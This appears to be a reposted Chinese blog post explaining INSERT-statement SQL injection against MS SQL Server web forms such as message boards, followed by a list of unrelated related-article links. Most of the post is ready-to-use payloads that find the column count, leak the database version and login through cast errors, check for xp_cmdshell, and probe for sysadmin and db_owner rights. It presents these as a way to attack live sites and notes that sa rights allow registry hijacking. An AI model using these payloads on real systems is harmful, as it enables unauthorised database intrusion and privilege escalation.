当碰到一些特殊的站时可以试着用insert注入(如:留言版神马的..前提是必须与数据库交互)
首先我们先了解下insert的语法
insert into table (column_name_1,column_name_2,column_n) vlaues (value_1,value_2,value_n)
当value值数大于column时,数据库就会爆出错误
于是当我们在网页中提交
a’,null,null,null,null,null);– 如返回错误页面
a’,null,null,null,null,null,null);–  如返回正常页面(至于过滤单引号的问题就不在本文讨论范围内了)
说明当前表字段数为7(不知是我理解错了不).
a’,cast(@@version as int),null,null,null,null,null);–试着爆出数据库版本
–cast 将@@version的值以整型输出到页面
a’,cast(system_user as int),null,null,null,null,null);–当前登陆名
a’,null,null,null,null,null,null);(select count(*) from master.dbo.sysobjects where xtype = ‘x’ and name = ‘xp_cmdshell’); –是否存在xp_cmdshell
查看权限
a’,null,null,null,null,null,null);(select IS_SRVROLEMEMBER(‘sysadmin’))=1; –sa ..如果爆出sa就爽了,可以劫持注册表神马的..
a’,null,null,null,null,null,null);(select IS_MEMBER(‘db_owner’))=1;–dbo ..可以backup或参考http://www.cnblogs.com/allyesno/archive/2007/07/29/835151.html
a’,null,null,null,null,null,null);(select IS_MEMBER(‘public’))=1;–public .这权限还真没成功过..

转载于:https://www.cnblogs.com/swane/archive/2011/04/02/2003245.html

insert式注射攻击解析相关推荐

  1. 网络安全!顶级大佬进行鱼叉式钓鱼攻击?手把手教学

    网络安全!顶级大佬进行鱼叉式钓鱼攻击?手把手教学 关于红队在渗透测试中使用的网络钓鱼攻击的文章很多,不过大多数的介绍都是不完整的. 在本文中,我们将对这个话题进行一次完整的梳理,包括域创建,制作网络钓 ...

  2. 网络安全 顶级进行鱼叉式钓鱼攻击?手把手教学

    网络安全!顶级大佬进行鱼叉式钓鱼攻击?手把手教学 关于红队在渗透测试中使用的网络钓鱼攻击的文章很多,不过大多数的介绍都是不完整的. 在本文中,我们将对这个话题进行一次完整的梳理,包括域创建,制作网络钓 ...

  3. 蝴蝶键盘 Linux,Macbook蝴蝶键盘与普通键盘有什么不一样? 蝶式结构键盘解析

    新苹果笔记本Macbook蝴蝶键盘与普通键盘有什么不一样了?在刚刚过去的苹果发布会上,苹果重点为大家介绍了自家的Macbook蝴蝶键盘/蝶式结构键盘,来看一下这个新式的键盘到底有什么不一样吧. Mac ...

  4. 检测组织中的横向鱼叉式钓鱼攻击

    Detecting Lateral Spear Phishing Attacks in Organizations 检测组织中的横向鱼叉式钓鱼攻击 1.背景 (1)会议/刊物级别 ​ IET(The ...

  5. 社会工程实战-鱼叉式钓鱼攻击

    [不一定能成功,因为邮件服务器会检测携带附件] 0x00 鱼叉式钓鱼攻击 攻击者通过发送带有攻击性的邮件给受害者,一旦受害者打开攻击邮件,点开攻击邮件中的附件等,就会给受害者的电脑造成一定的影响. 0 ...

  6. insert 语句_[原理解析] MySQL insert语句的磁盘写入之旅

    一条insert语句在写入磁盘的过程中到底涉及了哪些文件,顺序又是如何的?下面我们用两张图和大家一起解析insert语句的磁盘写入之旅. 图1: 事务提交前的日志文件写入 旅途过程: 首先 inser ...

  7. mysql数据库隐式表_解析MySQL隐式转换问题

    一.问题描述 root@mysqldb 22:12: [xucl]> show create table t1\G *************************** 1. row **** ...

  8. DDos攻击解析(附现状和案例)

    1. DDoS简介: 1.1 DdoS定义: DDOS是什么?分布式拒绝服务(DDoS:Distributed Denial of Service)攻击指借助于客户/服务器技术,将多个计算机联合起来作 ...

  9. 图的链式存储结构解析(邻接表、逆邻接表、十字链表、邻接多重表)

    图的矩阵表示法比较消耗空间,需要花费$ n 2 n^2 n2$个单元存储边(弧).在边数较少的情况下比较浪费.我们这里来讨论图的链式存储结构. 图的链式结构主要有四类:邻接表.逆邻接表.十字链表.邻接 ...

最新文章

  1. 模型压缩95%:Lite Transformer,MIT韩松等人
  2. mysql数据库语句q_mysql数据库命令大全,mysql基本命令大全
  3. HBase 1.2.6 完全分布式集群安装部署详细过程
  4. avrstudio5 拨码管
  5. 为GridView添加表头thead
  6. 如何利用反射实现EL表达式
  7. BZOJ3589 动态树(树链剖分+容斥原理)
  8. Redis 7.0 Multi Part AOF的设计和实现
  9. charles 中文_抓包工具--charles(青花瓷)及获取AppStore数据包
  10. Mac OS X将CSV格式转换为Excel文档格式,Excel转CSV中文乱码问题
  11. neo4j3.0 java使用_neo4j-java连接
  12. python字符串处理函数总结
  13. 2018科大讯飞AI营销算法大赛总结(冠军)
  14. 无线蹭网工具奶瓶Beini使用教程
  15. IntelliJ IDEA 最新版完美破解激活(转)
  16. 交换机:简述对交换机工作原理的认识
  17. SSH 文件操作命令
  18. (转)设置Sysctl.conf用以提高Linux的性能(最完整的sysctl.conf优化方案)
  19. Cocos2d开发系列(一)
  20. rdworksv8教学说明书_RDWorksv8软件下载

热门文章

  1. 暴风影音CEO冯鑫称与腾讯不惜一战
  2. 从零开始学习hadoop之发行版选择
  3. Promise深度学习---我のPromise/A+实现
  4. vim——打开多个文件、同时显示多个文件、在文件之间切换
  5. 添加firefox4的deb源,直接安装
  6. SharePoint 2010设置问卷调查权限
  7. OWIN and Katana
  8. 约瑟夫环 单向循环链表实现
  9. python编码与存储读取数据(数组字典)
  10. Linux:运行级别,root密码重置,救援模式,安装图形化界面